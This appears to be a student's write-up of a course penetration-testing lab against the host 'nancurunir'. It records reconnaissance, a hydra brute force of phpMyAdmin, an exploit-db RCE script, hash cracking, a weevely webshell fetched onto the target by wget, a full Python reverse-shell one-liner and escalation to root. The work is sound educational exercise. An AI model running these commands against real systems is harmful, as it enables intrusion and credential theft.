What gave me a lot of trouble during this lab was figuring out what to do once I got into the PHPMyadmin page. There was a lot going on, and the interface was slow and confusing so I spent a long time sifting through things that I figured could be useful. Eventually, when clicking on the 'users' table in the database, I found something that looked like a hash but it took me way to long to figure this out. I felt like this one was a lot harder than the other exploit lab we did recently as there were a lot more steps, but all the steps were things we had learned how to do in previous labs so it wasn't terrible.

• We don't know much about this target other than its FQDN, which is nancurunir.shire.org. That means we are going to have to leverage tools we have used in the past to perform reconaissance on this system and find the following:

• Performing an nslookup returned the addresses 76.223.54.146 and 13.248.169.48. According to Google, this can mean that one of the zones was not properly removed and both addresses point to this. (NOTE: This is Champlain's public IP.)
• After nslookup, I tried a default nmap scan on the FQDN. This returned much more info, and let me know that the 76 address is the active one.
• This didn't seem right, so I ran an nslookup on the FQDN using our internal DNS server. This returned the address 10.0.5.28

• After running an NMAP version/OS scan, we can see that port 80 is open and running Apache httpd 2.4.52 on Ubuntu Linux.

• *After getting into PHPMyAdmin, and getting into the admin portal, the Ubuntu version appears to be 8.0.30-0ubuntu0.22.04.1
• Since we know this is a web server now, I ran a curl on the IP address and took note of some potentially important words that could be leveraged in a password crack later on. (staff, gandalf, shallnotpass, glamdring, narya) It looks like this version of Apache is very vulnerable to memory overflow attacks and other memory-related exploits.
• Then, I used cewl to pipe all words on the page into a text document with cewl http://10.0.5.28 -d 1 > gandalf.small.txt. Some stuff in there was probably not relevant for passwords, so since it was so short already I went in and deleted useless words manually.
• I then mangled the password list with rsmangler --file gandalf.small.txt -x 12 -m 9 -l -s -e -i -p -u -a --output gandalf.mangled.txt
• To find more info, I ran dirb http://10.0.5.28 -r and found that a admin portal exists at http://10.0.5.28/phpmyadmin. Thinking this is the way we break in.
  • This part worked! I ran hydra -l gandalf -P gandalf.mangled.txt -s 80 -f 10.0.5.28 http-get /phpmyadmin/ and I got the username and password, which are gandalf and 1990Gandalf. I ran it again, and I got another password which is Gandalfadmin. This didn't work, and with some help from Prof. Furkan, I inspected the webpage in the F12 screen and tried shallnotpass which worked!
• PHP version looks like its 4.8.1. Seems like there is exploits for this: https://www.exploit-db.com/exploits/50457 (I just copied it and put it into a .py file) Looks like the syntax for this is .py [ipaddr] [port] [path] [username] [password] [command] to do RCE.

• It looks like an error has appeared on the server. It says The configuration file now needs a secret passphrase (blowfish_secret). Maybe this can be exploited?
• I went into the 'user' table and navigated to the 'edit' tab on the 'root' user, and copied the 'authentication_string' contents, as this appears to be a hash - I pasted it into CrackStation, and it looks like this worked! I got the result of gandalfthewhite. Not sure if this is a username or password.
• I ran the command python3 rce_myadmin.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass whoami and this seemed to run ok!
• Then, I generated a webshell with sudo weevely generate <password> ./miles_shell.php and uploaded it to Nancurunir with python3 -m http.server 8080, and did a wget from nancurunir now that I can use RCE: python3 rce_myadmin.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass "wget http://10.0.17.81:8080/miles_shell.php
  • Now that we have a webshell uploaded to the target, we can access it with sudo weevely http://10.0.5.28/phpmyadmin/miles_shell.php <password> and we're in!

• I used path traversal to navigate to the top directory and then to the etc directory to see if I could find the shadow file and the passw file. After getting the passwd file but not the shadow file, I remembered that we have other creds - I tried to elevate to gandalf, and this didn't work either. I did some more research and learned we need to upload a reverse shell via weevely. This can be done with the following:

Start a netcat listener on 4449
nc -nlvp 4449
Then, run the following on the target:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<target IP>",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

• Now we can run su gandalf to elevate to the gandalf user!

• Now I just have to get into root, which happened to have the same password as gandalf. I just ran a sudo -i (had to include -S tag because it told me to)

• The PHPMyadmin portal is not necessarily a vulnerability in itself, but in this case there was no input validation or sanitization on the MySQL part of the server. This means that anyone that is in the admin portal can freely access the hashes for passwords to user accounts, and in this case, I was able to get the hash for the root password of the target.